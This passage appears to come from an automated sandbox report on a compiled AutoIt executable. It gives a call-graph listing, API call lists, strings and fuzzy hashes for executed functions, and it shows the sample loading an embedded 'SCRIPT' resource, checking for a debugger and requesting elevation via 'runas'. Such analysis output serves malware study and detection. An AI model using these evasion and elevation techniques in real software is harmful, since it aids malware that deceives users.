d55faf 107012->107013 107014 d47667 60 API calls 107013->107014 107015 d55fba 107014->107015 107016 d60db6 Mailbox 60 API calls 107015->107016 107017 d4f908 107016->107017 107018 d560f9 107017->107018 107019 d56107 107018->107019 107020 d47667 60 API calls 107019->107020 107021 d56112 107020->107021 107022 d47667 60 API calls 107021->107022 107023 d5611d 107022->107023 107024 d47667 60 API calls 107023->107024 107025 d56128 107024->107025 107026 d47667 60 API calls 107025->107026 107027 d56133 107026->107027 107028 d55a9d 60 API calls 107027->107028 107029 d5613e 107028->107029 107030 d60db6 Mailbox 60 API calls 107029->107030 107031 d56145 RegisterWindowMessageW 107030->107031 107031->106981 107034 d9576f 107033->107034 107035 d5fdae 107033->107035 107052 da9ae7 61 API calls 107034->107052 107036 d60db6 Mailbox 60 API calls 107035->107036 107038 d5fdb6 107036->107038 107038->106985 107039 d9577a 107040->106992 107041->106994 107053 da71ed 66 API calls 107041->107053 107043 d47667 60 API calls 107042->107043 107044 d5ffe7 107043->107044 107045 d47667 60 API calls 107044->107045 107046 d5ffef 107045->107046 107047 d47667 60 API calls 107046->107047 107048 d5ff3b 107047->107048 107048->106998 107050 d47667 60 API calls 107049->107050 107051 d55aa5 107050->107051 107051->107012 107052->107039 107054 d41016 107059 d44974 107054->107059 107057 d62d40 __cinit 68 API calls 107058 d41025 107057->107058 107060 d60db6 Mailbox 60 API calls 107059->107060 107061 d4497c 107060->107061 107062 d4101b 107061->107062 107066 d44936 107061->107066 107062->107057 107067 d44951 107066->107067 107068 d4493f 107066->107068 107070 d449a0 107067->107070 107069 d62d40 __cinit 68 API calls 107068->107069 107069->107067 107071 d47667 60 API calls 107070->107071 107072 d449b8 GetVersionExW 107071->107072 107073 d47bcc 60 API calls 107072->107073 107074 d449fb 107073->107074 107075 d47d2c 60 API calls 107074->107075 107083 d44a28 107074->107083 107076 d44a1c 107075->107076 107077 d47726 60 API calls 107076->107077 107077->107083 107078 d44a93 GetCurrentProcess IsWow64Process 107079 d44aac 107078->107079 107081 d44ac2 107079->107081 107082 d44b2b GetSystemInfo 107079->107082 107080 d7d864 107094 d44b37 107081->107094 107084 d44af8 107082->107084 107083->107078 107083->107080 107084->107062 107087 d44ad4 107090 d44b37 2 API calls 107087->107090 107088 d44b1f GetSystemInfo 107089 d44ae9 107088->107089 107089->107084 107092 d44aef FreeLibrary 107089->107092 107091 d44adc GetNativeSystemInfo 107090->107091 107091->107089 107092->107084 107095 d44ad0 107094->107095 107096 d44b40 LoadLibraryA 107094->107096 107095->107087 107095->107088 107096->107095 107097 d44b51 GetProcAddress 107096->107097 107097->107095 107098 d43633 107099 d4366a 107098->107099 107100 d436e7 107099->107100 107101 d43688 107099->107101 107139 d436e5 107099->107139 107102 d436ed 107100->107102 107103 d7d0cc 107100->107103 107104 d43695 107101->107104 107105 d4374b PostQuitMessage 107101->107105 107107 d43715 SetTimer RegisterWindowMessageW 107102->107107 107108 d436f2 107102->107108 107147 d51070 10 API calls Mailbox 107103->107147 107110 d7d154 107104->107110 107111 d436a0 107104->107111 107112 d436d8 107105->107112 107106 d436ca DefWindowProcW 107106->107112 107107->107112 107116 d4373e CreatePopupMenu 107107->107116 107113 d7d06f 107108->107113 107114 d436f9 KillTimer 107108->107114 107152 da2527 72 API calls _memset 107110->107152 107117 d43755 107111->107117 107118 d436a8 107111->107118 107126 d7d074 107113->107126 107127 d7d0a8 MoveWindow 107113->107127 107143 d4443a Shell_NotifyIconW _memset 107114->107143 107115 d7d0f3 107148 d51093 342 API calls Mailbox 107115->107148 107116->107112 107145 d444a0 65 API calls _memset 107117->107145 107122 d436b3 107118->107122 107123 d7d139 107118->107123 107129 d436be 107122->107129 107130 d7d124 107122->107130 107123->107106 107151 d97c36 60 API calls Mailbox 107123->107151 107124 d7d166 107124->107106 107124->107112 107132 d7d097 SetFocus 107126->107132 107133 d7d078 107126->107133 107127->107112 107128 d4370c 107144 d43114 DeleteObject DestroyWindow Mailbox 107128->107144 107129->107106 107149 d4443a Shell_NotifyIconW _memset 107129->107149 107150 da2d36 82 API calls _memset 107130->107150 107131 d43764 107131->107112 107132->107112 107133->107129 107134 d7d081 107133->107134 107146 d51070 10 API calls Mailbox 107134->107146 107139->107106 107141 d7d118 107142 d4434a 69 API calls 107141->107142 107142->107139 107143->107128 107144->107112 107145->107131 107146->107112 107147->107115 107148->107129 107149->107141 107150->107131 107151->107139 107152->107124 107153 d4107d 107158 d4708b 107153->107158 107155 d4108c 107156 d62d40 __cinit 68 API calls 107155->107156 107157 d41096 107156->107157 107159 d4709b __ftell_nolock 107158->107159 107160 d47667 60 API calls 107159->107160 107161 d47151 107160->107161 107162 d44706 62 API calls 107161->107162 107163 d4715a 107162->107163 107189 d6050b 107163->107189 107166 d47cab 60 API calls 107167 d47173 107166->107167 107168 d43f74 60 API calls 107167->107168 107169 d47182 107168->107169 107170 d47667 60 API calls 107169->107170 107171 d4718b 107170->107171 107172 d47d8c 60 API calls 107171->107172 107173 d47194 RegOpenKeyExW 107172->107173 107174 d7e8b1 RegQueryValueExW 107173->107174 107178 d471b6 Mailbox 107173->107178 107175 d7e943 RegCloseKey 107174->107175 107176 d7e8ce 107174->107176 107175->107178 107188 d7e955 _wcscat Mailbox __wsetenvp 107175->107188 107177 d60db6 Mailbox 60 API calls 107176->107177 107179 d7e8e7 107177->107179 107178->107155 107181 d4522e 60 API calls 107179->107181 107180 d479f2 60 API calls 107180->107188 107182 d7e8f2 RegQueryValueExW 107181->107182 107183 d7e90f 107182->107183 107185 d7e929 107182->107185 107184 d47bcc 60 API calls 107183->107184 107184->107185 107185->107175 107186 d47de1 60 API calls 107186->107188 107187 d43f74 60 API calls 107187->107188 107188->107178 107188->107180 107188->107186 107188->107187 107190 d71940 __ftell_nolock 107189->107190 107191 d60518 GetFullPathNameW 107190->107191 107192 d6053a 107191->107192 107193 d47bcc 60 API calls 107192->107193 107194 d47165 107193->107194 107194->107166 107195 d7fdfc 107229 d4ab30 Mailbox _memmove 107195->107229 107197 d9617e Mailbox 60 API calls 107221 d4a057 107197->107221 107199 d60db6 60 API calls Mailbox 107199->107229 107202 d4b525 107384 da9e4a 90 API calls 4 library calls 107202->107384 107203 d80055 107383 da9e4a 90 API calls 4 library calls 107203->107383 107204 d60db6 60 API calls Mailbox 107219 d49f37 Mailbox 107204->107219 107206 d4b475 107211 d48047 60 API calls 107206->107211 107209 d4b47a 107209->107203 107224 d809e5 107209->107224 107210 d80064 107211->107221 107214 d48047 60 API calls 107214->107219 107216 d47667 60 API calls 107216->107219 107217 d47de1 60 API calls 107217->107229 107218 d96e8f 60 API calls 107218->107219 107219->107203 107219->107204 107219->107206 107219->107209 107219->107214 107219->107216 107219->107218 107220 d809d6 107219->107220 107219->107221 107222 d62d40 68 API calls __cinit 107219->107222 107225 d4a55a 107219->107225 107376 d4c8c0 342 API calls 2 library calls 107219->107376 107377 d4b900 61 API calls Mailbox 107219->107377 107388 da9e4a 90 API calls 4 library calls 107220->107388 107222->107219 107389 da9e4a 90 API calls 4 library calls 107224->107389 107387 da9e4a 90 API calls 4 library calls 107225->107387 107226 dbbc6b 342 API calls 107226->107229 107228 d4b2b6 107381 d4f6a3 342 API calls 107228->107381 107229->107199 107229->107202 107229->107217 107229->107219 107229->107221 107229->107226 107229->107228 107230 d49ea0 342 API calls 107229->107230 107232 d8086a 107229->107232 107234 d80878 107229->107234 107236 d8085c 107229->107236 107237 d4b21c 107229->107237 107240 d96e8f 60 API calls 107229->107240 107245 d51fc3 107229->107245 107285 dad07b 107229->107285 107332 dbdf23 107229->107332 107335 dbc2e0 107229->107335 107367 da7956 107229->107367 107373 d9617e 107229->107373 107378 d49c90 60 API calls Mailbox 107229->107378 107382 dbc193 86 API calls 2 library calls 107229->107382 107230->107229 107385 d49c90 60 API calls Mailbox 107232->107385 107386 da9e4a 90 API calls 4 library calls 107234->107386 107236->107197 107236->107221 107379 d49d3c 61 API calls Mailbox 107237->107379 107239 d4b22d 107380 d49d3c 61 API calls Mailbox 107239->107380 107240->107229 107246 d49a98 60 API calls 107245->107246 107247 d51fdb 107246->107247 107249 d60db6 Mailbox 60 API calls 107247->107249 107252 d86585 107247->107252 107250 d51ff4 107249->107250 107253 d52004 107250->107253 107405 d457a6 61 API calls Mailbox 107250->107405 107251 d52029 107261 d52036 107251->107261 107410 d49b3c 60 API calls 107251->107410 107252->107251 107409 daf574 60 API calls 107252->107409 107255 d49837 85 API calls 107253->107255 107256 d52012 107255->107256 107258 d457f6 68 API calls 107256->107258 107260 d52021 107258->107260 107259 d865cd 107259->107261 107262 d865d5 107259->107262 107260->107251 107260->107252 107408 d458ba CloseHandle 107260->107408 107263 d45cdf 2 API calls 107261->107263 107411 d49b3c 60 API calls 107262->107411 107266 d5203d 107263->107266 107267 d52057 107266->107267 107268 d865e7 107266->107268 107270 d47667 60 API calls 107267->107270 107269 d60db6 Mailbox 60 API calls 107268->107269 107271 d865ed 107269->107271 107272 d5205f 107270->107272 107273 d86601 107271->107273 107412 d45850 ReadFile SetFilePointerEx 107271->107412 107390 d45572 107272->107390 107279 d86605 _memmove 107273->107279 107413 da76c4 60 API calls 2 library calls 107273->107413 107277 d5206e 107277->107279 107406 d49a3c 60 API calls Mailbox 107277->107406 107280 d52082 Mailbox 107281 d520bc 107280->107281 107282 d45c6f CloseHandle 107280->107282 107281->107229 107283 d520b0 107282->107283 107283->107281 107407 d458ba CloseHandle 107283->107407 107286 dad09a 107285->107286 107287 dad0a5 107285->107287 107451 d49b3c 60 API calls 107286->107451 107289 dad17f Mailbox 107287->107289 107292 d47667 60 API calls 107287->107292 107290 d60db6 Mailbox 60 API calls 107289->107290 107328 dad188 Mailbox 107289->107328 107291 dad1c8 107290->107291 107293 dad1d4 107291->107293 107454 d457a6 61 API calls Mailbox 107291->107454 107294 dad0c9 107292->107294 107297 d49837 85 API calls 107293->107297 107296 d47667 60 API calls 107294->107296 107298 dad0d2 107296->107298 107299 dad1ec 107297->107299 107300 d49837 85 API calls 107298->107300 107301 d457f6 68 API calls 107299->107301 107302 dad0de 107300->107302 107303 dad1fb 107301->107303 107304 d4459b 60 API calls 107302->107304 107305 dad1ff GetLastError 107303->107305 107306 dad233 107303->107306 107307 dad0f3 107304->107307 107308 dad218 107305->107308 107310 dad25e 107306->107310 107311 dad295 107306->107311 107309 d47b2e 60 API calls 107307->107309 107308->107328 107455 d458ba CloseHandle 107308->107455 107312 dad126 107309->107312 107314 d60db6 Mailbox 60 API calls 107310->107314 107313 d60db6 Mailbox 60 API calls 107311->107313 107315 dad178 107312->107315 107316 da3c37 3 API calls 107312->107316 107317 dad29a 107313->107317 107318 dad263 107314->107318 107453 d49b3c 60 API calls 107315->107453 107321 dad136 107316->107321 107324 d47667 60 API calls 107317->107324 107317->107328 107322 dad274 107318->107322 107325 d47667 60 API calls 107318->107325 107321->107315 107323 dad13a 107321->107323 107456 dbfbce 60 API calls 2 library calls 107322->107456 107326 d47de1 60 API calls 107323->107326 107324->107328 107325->107322 107329 dad147 107326->107329 107328->107229 107452 da3a2a 64 API calls Mailbox 107329->107452 107331 dad150 Mailbox 107331->107315 107333 dbcadd 131 API calls 107332->107333 107334 dbdf33 107333->107334 107334->107229 107336 d47667 60 API calls 107335->107336 107337 dbc2f4 107336->107337 107338 d47667 60 API calls 107337->107338 107339 dbc2fc 107338->107339 107340 d47667 60 API calls 107339->107340 107341 dbc304 107340->107341 107342 d49837 85 API calls 107341->107342 107353 dbc312 107342->107353 107343 dbc528 Mailbox 107343->107229 107344 d47bcc 60 API calls 107344->107353 107345 d47924 60 API calls 107345->107353 107347 dbc4e2 107348 d47cab 60 API calls 107347->107348 107350 dbc4ef 107348->107350 107349 dbc4fd 107351 d47cab 60 API calls 107349->107351 107355 d47b2e 60 API calls 107350->107355 107356 dbc50c 107351->107356 107352 d48047 60 API calls 107352->107353 107353->107343 107353->107344 107353->107345 107353->107347 107353->107349 107353->107352 107354 d47e4f 60 API calls 107353->107354 107357 d47e4f 60 API calls 107353->107357 107359 dbc4fb 107353->107359 107364 d49837 85 API calls 107353->107364 107365 d47cab 60 API calls 107353->107365 107366 d47b2e 60 API calls 107353->107366 107358 dbc3a9 CharUpperBuffW 107354->107358 107355->107359 107360 d47b2e 60 API calls 107356->107360 107361 dbc469 CharUpperBuffW 107357->107361 107457 d4843a 69 API calls 107358->107457 107359->107343 107459 d49a3c 60 API calls Mailbox 107359->107459 107360->107359 107458 d4c5a7 70 API calls 2 library calls 107361->107458 107364->107353 107365->107353 107366->107353 107368 da7962 107367->107368 107369 d60db6 Mailbox 60 API calls 107368->107369 107370 da7970 107369->107370 107371 da797e 107370->107371 107372 d47667 60 API calls 107370->107372 107371->107229 107372->107371 107460 d960c0 107373->107460 107375 d9618c 107375->107229 107376->107219 107377->107219 107378->107229 107379->107239 107380->107228 107381->107202 107382->107229 107383->107210 107384->107236 107385->107236 107386->107236 107387->107221 107388->107224 107389->107221 107391 d455a2 107390->107391 107392 d4557d 107390->107392 107393 d47d8c 60 API calls 107391->107393 107392->107391 107397 d4558c 107392->107397 107396 da325e 107393->107396 107394 da328d 107394->107277 107396->107394 107414 da31fa ReadFile SetFilePointerEx 107396->107414 107415 d47924 60 API calls 2 library calls 107396->107415 107416 d45ab8 107397->107416 107404 da339c Mailbox 107404->107277 107405->107253 107406->107280 107407->107281 107408->107252 107409->107252 107410->107259 107411->107266 107412->107273 107413->107279 107414->107396 107415->107396 107417 d60db6 Mailbox 60 API calls 107416->107417 107418 d45acb 107417->107418 107419 d60db6 Mailbox 60 API calls 107418->107419 107420 d45ad7 107419->107420 107421 d454d2 107420->107421 107428 d458cf 107421->107428 107423 d45bc0 2 API calls 107425 d454e3 107423->107425 107424 d45514 107424->107404 107427 d477da 62 API calls Mailbox 107424->107427 107425->107423 107425->107424 107435 d45a7a 107425->107435 107427->107404 107429 d458e0 107428->107429 107430 d7dc3c 107428->107430 107429->107425 107444 d95ecd 60 API calls Mailbox 107430->107444 107432 d7dc46 107433 d60db6 Mailbox 60 API calls 107432->107433 107434 d7dc52 107433->107434 107436 d7dcee 107435->107436 107437 d45a8e 107435->107437 107450 d95ecd 60 API calls Mailbox 107436->107450 107445 d459b9 107437->107445 107440 d45a9a 107440->107425 107441 d7dcf9 107442 d60db6 Mailbox 60 API calls 107441->107442 107443 d7dd0e _memmove 107442->107443 107444->107432 107446 d459d1 107445->107446 107449 d459ca _memmove 107445->107449 107447 d60db6 Mailbox 60 API calls 107446->107447 107448 d7dc7e 107446->107448 107447->107449 107449->107440 107450->107441 107451->107287 107452->107331 107453->107289 107454->107293 107455->107328 107456->107328 107457->107353 107458->107353 107459->107343 107461 d960e8 107460->107461 107462 d960cb 107460->107462 107461->107375 107462->107461 107464 d960ab 60 API calls Mailbox 107462->107464 107464->107462 107465 d4552a 107466 d45ab8 60 API calls 107465->107466 107467 d4553c 107466->107467 107468 d454d2 62 API calls 107467->107468 107469 d4554a 107468->107469 107471 d4555a Mailbox 107469->107471 107472 d48061 62 API calls Mailbox 107469->107472 107472->107471 107473 d4e5ab 107476 d4d100 107473->107476 107475 d4e5b9 107477 d4d11d 107476->107477 107504 d4d37d 107476->107504 107478 d826e0 107477->107478 107479 d82691 107477->107479 107507 d4d144 107477->107507 107523 dba3e6 342 API calls __cinit 107478->107523 107482 d82694 107479->107482 107489 d826af 107479->107489 107483 d826a0 107482->107483 107482->107507 107521 dba9fa 342 API calls 107483->107521 107485 d62d40 __cinit 68 API calls 107485->107507 107487 d828b5 107487->107487 107488 d4d54b 107488->107475 107489->107504 107522 dbaea2 342 API calls 3 library calls 107489->107522 107490 d4d434 107516 d48a52 69 API calls 107490->107516 107493 d48740 69 API calls 107493->107507 107494 d4d443 107494->107475 107495 d827fc 107527 dba751 90 API calls 107495->107527 107499 d484c0 70 API calls 107499->107507 107504->107488 107528 da9e4a 90 API calls 4 library calls 107504->107528 107506 d49ea0 342 API calls 107506->107507 107507->107485 107507->107488 107507->107490 107507->107493 107507->107495 107507->107499 107507->107504 107507->107506 107508 d48047 60 API calls 107507->107508 107510 d49dda 107507->107510 107515 d48542 69 API calls 107507->107515 107517 d4843a 69 API calls 107507->107517 107518 d4cf7c 342 API calls 107507->107518 107519 d4cf00 90 API calls 107507->107519 107520 d4cd7d 342 API calls 107507->107520 107524 d48a52 69 API calls 107507->107524 107525 d49d3c 61 API calls Mailbox 107507->107525 107526 d9678d 61 API calls 107507->107526 107508->107507 107511 d60db6 Mailbox 60 API calls 107510->107511 107512 d49de7 107511->107512 107513 d49df6 107512->107513 107514 d47de1 60 API calls 107512->107514 107513->107507 107514->107513 107515->107507 107516->107494 107517->107507 107518->107507 107519->107507 107520->107507 107521->107488 107522->107504 107523->107507 107524->107507 107525->107507 107526->107507 107527->107504 107528->107487

                            Executed Functions

                            Function 00D43B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D43B68
                            • IsDebuggerPresent.KERNEL32 ref: 00D43B7A
                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00E052F8,00E052E0,?,?), ref: 00D43BEB
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                              • Part of subcall function 00D5092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D43C14,00E052F8,?,?,?), ref: 00D5096E
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00D43C6F
                            • MessageBoxA.USER32 ref: 00D7D281
                            • SetCurrentDirectoryW.KERNEL32(?,00E052F8,?,?,?), ref: 00D7D2B9
                            • GetForegroundWindow.USER32 ref: 00D7D33F
                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00D7D346
                              • Part of subcall function 00D43A46: GetSysColorBrush.USER32 ref: 00D43A50
                              • Part of subcall function 00D43A46: LoadCursorW.USER32 ref: 00D43A5F
                              • Part of subcall function 00D43A46: LoadIconW.USER32 ref: 00D43A76
                              • Part of subcall function 00D43A46: LoadIconW.USER32 ref: 00D43A88
                              • Part of subcall function 00D43A46: LoadIconW.USER32 ref: 00D43A9A
                              • Part of subcall function 00D43A46: LoadImageW.USER32 ref: 00D43AC0
                              • Part of subcall function 00D43A46: RegisterClassExW.USER32(?), ref: 00D43B16
                              • Part of subcall function 00D439D5: CreateWindowExW.USER32 ref: 00D43A03
                              • Part of subcall function 00D439D5: CreateWindowExW.USER32 ref: 00D43A24
                              • Part of subcall function 00D439D5: ShowWindow.USER32(00000000), ref: 00D43A38
                              • Part of subcall function 00D439D5: ShowWindow.USER32(00000000), ref: 00D43A41
                              • Part of subcall function 00D4434A: _memset.LIBCMT ref: 00D44370
                              • Part of subcall function 00D4434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D44415
                            Strings
                            • This is a third-party compiled AutoIt script., xrefs: 00D7D279
                            • runas, xrefs: 00D7D33A
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                            • String ID: This is a third-party compiled AutoIt script.$runas
                            • API String ID: 529118366-3287110873
                            • Opcode ID: 0b1b3b5c41c0fa7ae46590d270224702e8e279cae58ef9a2a68c6da7470cc0fd
                            • Instruction ID: c7233b53f2cc5158e042d14dafc17036ab38d544d4d47cd8f6ddfac173c1bc63
                            • Opcode Fuzzy Hash: 0b1b3b5c41c0fa7ae46590d270224702e8e279cae58ef9a2a68c6da7470cc0fd
                            • Instruction Fuzzy Hash: DB51B132D08249AFDF01ABB9DC46EEE7B79EF45700B148065F451B21A2DA61968ACF31
                            Function 00D449A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 994 d449a0-d44a00 call d47667 GetVersionExW call d47bcc 999 d44a06 994->999 1000 d44b0b-d44b0d 994->1000 1002 d44a09-d44a0e 999->1002 1001 d7d767-d7d773 1000->1001 1003 d7d774-d7d778 1001->1003 1004 d44a14 1002->1004 1005 d44b12-d44b13 1002->1005 1007 d7d77b-d7d787 1003->1007 1008 d7d77a 1003->1008 1006 d44a15-d44a4c call d47d2c call d47726 1004->1006 1005->1006 1016 d7d864-d7d867 1006->1016 1017 d44a52-d44a53 1006->1017 1007->1003 1010 d7d789-d7d78e 1007->1010 1008->1007 1010->1002 1012 d7d794-d7d79b 1010->1012 1012->1001 1014 d7d79d 1012->1014 1018 d7d7a2-d7d7a5 1014->1018 1019 d7d880-d7d884 1016->1019 1020 d7d869 1016->1020 1017->1018 1021 d44a59-d44a64 1017->1021 1022 d44a93-d44aaa GetCurrentProcess IsWow64Process 1018->1022 1023 d7d7ab-d7d7c9 1018->1023 1028 d7d886-d7d88f 1019->1028 1029 d7d86f-d7d878 1019->1029 1024 d7d86c 1020->1024 1025 d7d7ea-d7d7f0 1021->1025 1026 d44a6a-d44a6c 1021->1026 1030 d44aac 1022->1030 1031 d44aaf-d44ac0 1022->1031 1023->1022 1027 d7d7cf-d7d7d5 1023->1027 1024->1029 1036 d7d7f2-d7d7f5 1025->1036 1037 d7d7fa-d7d800 1025->1037 1032 d7d805-d7d811 1026->1032 1033 d44a72-d44a75 1026->1033 1034 d7d7d7-d7d7da 1027->1034 1035 d7d7df-d7d7e5 1027->1035 1028->1024 1038 d7d891-d7d894 1028->1038 1029->1019 1030->1031 1039 d44ac2-d44ad2 call d44b37 1031->1039 1040 d44b2b-d44b35 GetSystemInfo 1031->1040 1044 d7d813-d7d816 1032->1044 1045 d7d81b-d7d821 1032->1045 1041 d7d831-d7d834 1033->1041 1042 d44a7b-d44a8a 1033->1042 1034->1022 1035->1022 1036->1022 1037->1022 1038->1029 1053 d44ad4-d44ae1 call d44b37 1039->1053 1054 d44b1f-d44b29 GetSystemInfo 1039->1054 1043 d44af8-d44b08 1040->1043 1041->1022 1050 d7d83a-d7d84f 1041->1050 1047 d7d826-d7d82c 1042->1047 1048 d44a90 1042->1048 1044->1022 1045->1022 1047->1022 1048->1022 1051 d7d851-d7d854 1050->1051 1052 d7d859-d7d85f 1050->1052 1051->1022 1052->1022 1059 d44ae3-d44ae7 GetNativeSystemInfo 1053->1059 1060 d44b18-d44b1d 1053->1060 1055 d44ae9-d44aed 1054->1055 1055->1043 1058 d44aef-d44af2 FreeLibrary 1055->1058 1058->1043 1059->1055 1060->1059
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 00D449CD
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • GetCurrentProcess.KERNEL32(?,00DCFAEC,00000000,00000000,?), ref: 00D44A9A
                            • IsWow64Process.KERNEL32(00000000), ref: 00D44AA1
                            • GetNativeSystemInfo.KERNEL32(00000000), ref: 00D44AE7
                            • FreeLibrary.KERNEL32(00000000), ref: 00D44AF2
                            • GetSystemInfo.KERNEL32(00000000), ref: 00D44B23
                            • GetSystemInfo.KERNEL32(00000000), ref: 00D44B2F
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                            • String ID:
                            • API String ID: 1986165174-0
                            • Opcode ID: ea6463f98a8a2f60101f6814f6b9a68882e8fded8aa576e35b46a921c5a408f3
                            • Instruction ID: e85e9b5db517ac88adcd3d444308fd7a624ef99ff2718948a709ae9185be9ef3
                            • Opcode Fuzzy Hash: ea6463f98a8a2f60101f6814f6b9a68882e8fded8aa576e35b46a921c5a408f3
                            • Instruction Fuzzy Hash: 3491C4319897C1DFC731CB6885516AAFFF5AF29304B484DADD0CB93A41D620E548C77A
                            Function 00D44E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1102 d44e89-d44ea1 CreateStreamOnHGlobal 1103 d44ec1-d44ec6 1102->1103 1104 d44ea3-d44eba FindResourceExW 1102->1104 1105 d7d933-d7d942 LoadResource 1104->1105 1106 d44ec0 1104->1106 1105->1106 1107 d7d948-d7d956 SizeofResource 1105->1107 1106->1103 1107->1106 1108 d7d95c-d7d967 LockResource 1107->1108 1108->1106 1109 d7d96d-d7d98b 1108->1109 1109->1106
                            APIs
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00D44E99
                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D44D8E,?,?,00000000,00000000), ref: 00D44EB0
                            • LoadResource.KERNEL32(?,00000000,?,?,00D44D8E,?,?,00000000,00000000,?,?,?,?,?,?,00D44E2F), ref: 00D7D937
                            • SizeofResource.KERNEL32(?,00000000,?,?,00D44D8E,?,?,00000000,00000000,?,?,?,?,?,?,00D44E2F), ref: 00D7D94C
                            • LockResource.KERNEL32(00D44D8E,?,?,00D44D8E,?,?,00000000,00000000,?,?,?,?,?,?,00D44E2F,00000000), ref: 00D7D95F
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                            • String ID: SCRIPT
                            • API String ID: 3051347437-3967369404
                            • Opcode ID: 2641f8c29308cf4dc0e396143db433ab8e4e1f057d574182047cfc36e6b447cf
                            • Instruction ID: 72a909603033b0d20e0a4138852fa4282e0c889bf8c9959ca4769e8b89ba1d41
                            • Opcode Fuzzy Hash: 2641f8c29308cf4dc0e396143db433ab8e4e1f057d574182047cfc36e6b447cf
                            • Instruction Fuzzy Hash: 6A114C75240702AFD7218B65EC48F67BBBAEBC5B11F144268F505C6250DB61E8408A70
                            Function 00D4E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID: Dd$Dd$Dd$Dd$Variable must be of type 'Object'.
                            • API String ID: 0-2781164977
                            • Opcode ID: 059bf477fa3c05f6aec13cb83748b93ccbbdcd9511d06e084bb13ce762abc9d8
                            • Instruction ID: 9e245ed572d8af9a64975c7d3957d92840435f5f08c77b8535705331e4b1c2c8
                            • Opcode Fuzzy Hash: 059bf477fa3c05f6aec13cb83748b93ccbbdcd9511d06e084bb13ce762abc9d8
                            • Instruction Fuzzy Hash: 66A29E74A00215EFCB24CF58C480AAEB7B2FF59314F288569E855AB351D735ED86CBB0
                            Function 00DA445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(?,00D7E398), ref: 00DA446A
                            • FindFirstFileW.KERNELBASE(?,?), ref: 00DA447B
